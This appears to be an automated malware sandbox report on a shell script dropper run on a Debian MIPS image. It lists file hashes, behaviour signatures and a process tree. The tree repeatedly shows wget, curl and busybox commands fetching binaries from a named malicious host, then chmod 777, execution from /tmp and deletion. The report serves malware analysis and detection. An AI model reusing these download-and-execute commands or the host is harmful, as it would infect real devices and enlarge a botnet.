Analysis
-
max time kernel
77s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/11/2024, 06:53
Static task
static1
Behavioral task
behavioral1
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh
-
Size
10KB
-
MD5
89550f6e6c530e2e689d60a56a4df5a4
-
SHA1
f5860c4d0ff43486d05d62f626f554dc70e97a56
-
SHA256
9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46
-
SHA512
bd1838359f068081fe2be6ec32996de963bf2e4e9787b6dd610712207a56fbbf82b24855a6068c08419301d92630704d60a8b549484f768d73250df56d5f3317
-
SSDEEP
192:rEQtGW4t957M1XHy5NK6e55EQtGWQXXHy5NneDy5:eX57Mr6eBeu5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 927 chmod 969 chmod 976 chmod 758 chmod 824 chmod 878 chmod 941 chmod 1011 chmod 751 chmod 868 chmod 892 chmod 913 chmod 934 chmod 955 chmod 885 chmod 962 chmod 1018 chmod 948 chmod 983 chmod 1004 chmod 775 chmod 816 chmod 899 chmod 990 chmod 906 chmod 920 chmod 847 chmod 997 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV 752 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ 759 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV 776 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi 817 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz 825 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT 849 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF 869 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V 879 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd 886 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo 893 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z 900 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG 907 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS 914 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 921 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV 928 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ 935 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV 942 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi 949 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz 956 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT 963 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF 970 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z 977 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG 984 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS 991 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 998 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V 1005 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd 1012 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo 1019 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 945 curl 795 curl 827 wget 937 wget 982 busybox 882 curl 889 curl 910 curl 902 wget 924 curl 933 busybox 896 curl 954 busybox 958 wget 961 busybox 972 wget 750 busybox 837 busybox 871 wget 996 busybox 1000 wget 820 wget 891 busybox 912 busybox 898 busybox 909 wget 919 busybox 951 wget 993 wget 754 wget 762 curl 854 wget 994 curl 980 curl 1007 wget 1008 curl 1010 busybox 735 curl 821 curl 952 curl 966 curl 989 busybox 1001 curl 1003 busybox 809 busybox 884 busybox 959 curl 755 curl 1017 busybox 973 curl 987 curl 757 busybox 905 busybox 930 wget 940 busybox 975 busybox 726 wget 823 busybox 923 wget 986 wget 781 wget 865 curl 895 wget 938 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo curl File opened for modification /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 curl File opened for modification /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi curl File opened for modification /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG curl File opened for modification /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z curl File opened for modification /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF curl File opened for modification /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV curl File opened for modification /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz curl File opened for modification /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS curl File opened for modification /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV curl File opened for modification /tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi curl File opened for modification /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd curl File opened for modification /tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG curl File opened for modification /tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV curl File opened for modification /tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9 curl File opened for modification /tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd curl File opened for modification /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT curl File opened for modification /tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF curl File opened for modification /tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS curl File opened for modification /tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z curl File opened for modification /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V curl File opened for modification /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ curl File opened for modification /tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V curl File opened for modification /tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV curl File opened for modification /tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz curl File opened for modification /tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT curl File opened for modification /tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ curl File opened for modification /tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo curl
Processes
-
/tmp/9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh/tmp/9108d33f22fb170bfffd8fa9a24b7c087823d36b3e3b08d0a84ac9562c89ba46.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:726
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:757
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:760
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:761
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:770
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:780
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- System Network Configuration Discovery
PID:781
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:823
-
-
/bin/chmodchmod 777 mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz./mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵PID:826
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- System Network Configuration Discovery
PID:837
-
-
/bin/chmodchmod 777 fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT./fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm fiH9b7Qvtk3b95EpFUHh36ekDlCSBa68KT2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- System Network Configuration Discovery
PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:867
-
-
/bin/chmodchmod 777 ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF./ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm ytAEWg8rTC3cfCZ3E6LbbwrjmAlov4EOXF2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:874
-
-
/bin/chmodchmod 777 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V./2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 2NiflATeK5G1jIQRUgupVyxxnvHBzTuB0V2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd./gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm gJv17q4xBkY4FxKoy0JrYF1flesuzX8mRd2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- System Network Configuration Discovery
PID:891
-
-
/bin/chmodchmod 777 QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo./QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm QMGgPwbR2CncrqYmGZJyoWU8ppPCdf4aHo2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z./1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 1HL1GKbgbmCBin33FWzhFSnPdgMFfo9v4z2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG./NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm NXNfvXy4H8RR3hPfxDNDd4uKu6923JcVqG2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS./ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm ShwXxxIWtOIj7Ef3gkzf1J7W0SlcNbZigS2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU9./Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm Y5gcLkQGPd888LQwACGlGlhDG6wZNzCcU92⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:926
-
-
/bin/chmodchmod 777 sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV./sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm sTJAQQD7koO7wNCw8Ik1fcKNKW5R9gsYFV2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ./jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm jmYbrtJZDjv0FGXbkbB84XH7fav5osHTpZ2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV./uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm uKJlke9KW7mGoZrkvxpfKBTYxGiTZMMjKV2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:947
-
-
/bin/chmodchmod 777 FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi./FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm FgLUXCNMPdOngJOMlWLfqqaHg1yfggiibi2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mfkqxuRQZ8jcEQLo2T9kpSkGYT7qbxWFgz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
